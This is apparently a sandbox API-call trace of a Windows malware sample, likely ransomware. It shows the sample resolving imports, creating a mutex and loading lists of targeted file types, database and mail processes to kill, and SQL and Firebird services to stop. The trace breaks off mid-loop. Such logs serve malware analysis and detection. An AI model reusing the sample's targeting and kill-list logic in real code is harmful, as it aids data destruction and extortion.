# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: May 15 2019 18:28:42 # Log Creation Date: 16.05.2019 14:45:54.824 Process: id = "1" image_name = "cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" page_root = "0x4d0be000" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x9ac [0025.211] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0025.211] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0025.211] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0025.211] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0025.211] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0025.211] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0025.211] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220 [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0025.212] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76c34173 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceFrequency") returned 0x76c341f0 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="GetVolumeInformationW") returned 0x76c4c860 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="CreatePipe") returned 0x76cb415b [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleInformation") returned 0x76c4195c [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringA") returned 0x76c33c5a [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0025.213] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0025.214] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96 [0025.214] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e [0025.214] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0025.214] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0025.214] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0025.214] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0025.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000 [0028.642] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0028.642] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0028.642] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0028.642] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0028.642] GetProcAddress (hModule=0x74d40000, lpProcName="OpenProcessToken") returned 0x74d54304 [0028.642] GetProcAddress (hModule=0x74d40000, lpProcName="GetTokenInformation") returned 0x74d5431c [0028.643] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64 [0028.643] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c [0028.643] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c [0028.643] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144 [0028.643] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86 [0028.643] GetProcAddress (hModule=0x74d40000, lpProcName="EnumDependentServicesW") returned 0x74d41e3a [0028.643] GetProcAddress (hModule=0x74d40000, lpProcName="EnumServicesStatusExW") returned 0x74d4b466 [0028.643] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74f40000 [0031.197] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0031.197] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0033.203] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0033.203] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0033.203] GetProcAddress (hModule=0x77130000, lpProcName="NtQuerySystemInformation") returned 0x7714fda0 [0033.203] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74b50000 [0033.284] GetProcAddress (hModule=0x74b50000, lpProcName="WNetCloseEnum") returned 0x74b52dd6 [0033.284] GetProcAddress (hModule=0x74b50000, lpProcName="WNetOpenEnumW") returned 0x74b52f06 [0033.284] GetProcAddress (hModule=0x74b50000, lpProcName="WNetEnumResourceW") returned 0x74b53058 [0033.284] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75bc0000 [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="WSAStartup") returned 0x75bc3ab2 [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="socket") returned 0x75bc3eb8 [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="recv") returned 0x75bc6b0e [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="connect") returned 0x75bc6bdd [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="closesocket") returned 0x75bc3918 [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="gethostbyname") returned 0x75bd7673 [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="inet_addr") returned 0x75bc311b [0033.486] GetProcAddress (hModule=0x75bc0000, lpProcName="ntohl") returned 0x75bc2d57 [0033.487] GetProcAddress (hModule=0x75bc0000, lpProcName="htonl") returned 0x75bc2d57 [0033.487] GetProcAddress (hModule=0x75bc0000, lpProcName="htons") returned 0x75bc2d8b [0033.487] GetProcessHeap () returned 0x600000 [0033.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614248 [0033.487] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=15393457807) returned 1 [0033.487] GetTickCount () returned 0x17d59 [0033.487] GetCurrentProcessId () returned 0x9a8 [0033.488] GetTickCount () returned 0x17d59 [0033.488] GetTickCount () returned 0x17d59 [0033.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614270 [0033.488] GetVersion () returned 0x1db10106 [0033.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x7) returned 0x603830 [0033.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x610d50 [0033.488] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610d50, Size=0x20) returned 0x6142c0 [0033.488] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6142c0, Size=0x40) returned 0x614830 [0033.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x614a80 [0033.488] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2DWHU4A") returned 0x0 [0033.488] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_2DWHU4A") returned 0x84 [0033.488] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x603830 | out: hHeap=0x600000) returned 1 [0033.488] lstrlenW (lpString="Global\\syncronize_") returned 18 [0033.488] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614830 | out: hHeap=0x600000) returned 1 [0033.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x7) returned 0x603830 [0033.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x610d50 [0033.488] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610d50, Size=0x20) returned 0x6142c0 [0033.488] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6142c0, Size=0x40) returned 0x614830 [0033.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x624a88 [0033.489] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2DWHU4U") returned 0x0 [0033.489] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_2DWHU4U") returned 0x88 [0033.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x603830 | out: hHeap=0x600000) returned 1 [0033.489] lstrlenW (lpString="Global\\syncronize_") returned 18 [0033.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614830 | out: hHeap=0x600000) returned 1 [0033.489] GetVersion () returned 0x1db10106 [0033.489] GetCurrentProcess () returned 0xffffffff [0033.489] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0033.489] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0033.489] CloseHandle (hObject=0x8c) returned 1 [0033.489] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0033.489] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x3e8) returned 0x0 [0033.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x603830 [0033.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x610d50 [0033.489] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610d50, Size=0x20) returned 0x6142c0 [0033.489] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6142c0, Size=0x40) returned 0x614830 [0033.489] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614830, Size=0x80) returned 0x614830 [0033.489] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614830, Size=0x100) returned 0x614830 [0033.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x34) returned 0x614938 [0033.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x610940 [0033.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x610950 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x610960 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x610d50 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x614978 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x610d68 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614978, Size=0x8) returned 0x614978 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x610d80 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614978, Size=0x10) returned 0x614978 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x610d98 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x610db0 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614978, Size=0x20) returned 0x614978 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x610dc8 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x610de0 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610940, Size=0x8) returned 0x610940 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610950, Size=0x8) returned 0x610950 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6149a0 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x610df8 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x6149b0 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x610e10 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6149b0, Size=0x8) returned 0x6149b0 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634aa8 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6149b0, Size=0x10) returned 0x6149b0 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634ac0 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6149c8 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6149b0, Size=0x20) returned 0x6149d8 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610940, Size=0x10) returned 0x6149b0 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610950, Size=0x10) returned 0x614a00 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x610940 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634ad8 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x610950 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634af0 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x610950, Size=0x8) returned 0x610950 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x614a18 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634b08 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x614a28 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634b20 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614a28, Size=0x8) returned 0x614a28 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6149b0, Size=0x20) returned 0x634e90 [0033.490] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614a00, Size=0x20) returned 0x634eb8 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x614a00 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634b38 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x6149b0 [0033.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x634b50 [0033.491] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6149b0, Size=0x8) returned 0x6149b0 [0033.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x634ee0 [0033.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x634f00 [0033.491] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0033.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614830 | out: hHeap=0x600000) returned 1 [0033.491] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fdf0 | out: lpWSAData=0x18fdf0) returned 0 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b68 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b68, Size=0x20) returned 0x6144c8 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144c8, Size=0x40) returned 0x614888 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x80) returned 0x614888 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x100) returned 0x6351d8 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b68 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b68, Size=0x20) returned 0x6144c8 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144c8, Size=0x40) returned 0x614888 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x80) returned 0x614888 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x100) returned 0x6352e0 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634b68 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x614888 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x8) returned 0x614888 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x614898 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x10) returned 0x6148b8 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x6148d0 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x6144c8 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6148b8, Size=0x20) returned 0x6148f0 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1c) returned 0x6144f0 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x16) returned 0x614918 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x614518 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x634b98 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x614888 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40) returned 0x6353e8 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x8) returned 0x614888 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x3c) returned 0x635430 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614888, Size=0x10) returned 0x6148b8 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x635478 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x635498 [0033.503] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6148b8, Size=0x20) returned 0x6354b8 [0033.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x24) returned 0x6354e0 [0033.503] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0033.503] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6351d8 | out: hHeap=0x600000) returned 1 [0033.503] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0033.503] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6352e0 | out: hHeap=0x600000) returned 1 [0033.503] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x635a60 [0033.506] EnumServicesStatusExW (in: hSCManager=0x635a60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 0 [0033.506] GetLastError () returned 0xea [0033.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x639360 [0033.507] EnumServicesStatusExW (in: hSCManager=0x635a60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x639360, cbBufSize=0x11e4, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x639360, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 1 [0033.507] CloseServiceHandle (hSCObject=0x635a60) returned 1 [0033.509] lstrlenW (lpString="Appinfo") returned 7 [0033.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0033.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0033.509] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0033.509] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0033.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0033.509] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0033.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.509] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0033.509] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0033.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0033.509] lstrlenW (lpString="AudioSrv") returned 8 [0033.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0033.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0033.509] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0033.509] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0033.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0033.509] lstrlenW (lpString="BFE") returned 3 [0033.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0033.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0033.509] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0033.510] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0033.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0033.510] lstrlenW (lpString="CryptSvc") returned 8 [0033.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0033.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0033.510] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0033.510] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0033.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0033.510] lstrlenW (lpString="CscService") returned 10 [0033.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0033.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0033.510] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0033.510] 